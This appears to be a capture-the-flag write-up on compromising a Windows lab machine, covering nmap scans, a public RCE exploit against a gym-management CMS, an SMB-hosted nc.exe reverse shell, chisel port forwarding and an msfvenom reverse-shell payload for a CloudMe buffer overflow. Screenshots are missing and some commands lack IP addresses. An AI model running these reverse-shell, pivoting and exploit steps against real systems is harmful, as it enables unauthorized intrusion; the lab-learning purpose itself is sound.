Skip to content

Latest commit



131 lines (68 loc) · 2.41 KB

File metadata and controls

131 lines (68 loc) · 2.41 KB
nmap -p- --min-rate 10000 -Pn 

Alt text

After knowing open ports (7680,8080), we can do greater nmap scan.

nmap -A -sC -sV -p7680,8080 -Pn 

From enumeration, I see that it is CMS for Gym management system.

Alt text

I searched publicly known exploit and found RCE exploit.

Alt text

Let's use this exploit.



Alt text

Let's make interactive shell, for this we need to upload nc.exe into target machine.

1.First, we need to open SMB share.

python3 /usr/share/doc/python3-impacket/examples/ share . -smb2support

Alt text

2.Second, we need to download this into machine.

copy \\\share\nc.exe \programdata\nc.exe

Alt text

Let's use the exploit.

\programdata\nc.exe -e cmd 1337

Alt text

We got reverse shell from port 1337.

Alt text

I just look at the machine via netstat -ano command and see open port (8888).

Alt text

I searched this port which belongs to 'CloudMe.exe'.

Now, it's time to do Port Forwarding, for this I will use Chisel.

For this, we need to upload chisel.exe into target machine via SMB.

copy \\\share\chisel_1.9.1_windows_amd64 c.exe

Alt text

Let's use chisel to create connection (PIVOTING).

1.First, run below command on attacker's machine.

./chisel_1.9.1_linux_amd64 server -p 8000 --reverse

Alt text

2.Second, run below command on target's machine.

.\c.exe client R:8888:localhost:8888

Alt text

I find CloudMe 1.11.2 - Buffer Overflow (PoC) exploit which is Buffer Overflow.

But we need to add our malicious reverse shell command into script via msfvenom command to generate.

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST= LPORT=1337 -b '\x00\x0A\x0D' -f python -v payload

Alt text

As we replaced we can run the script python2

I got reverse shell from port (1337).

Alt text


Alt text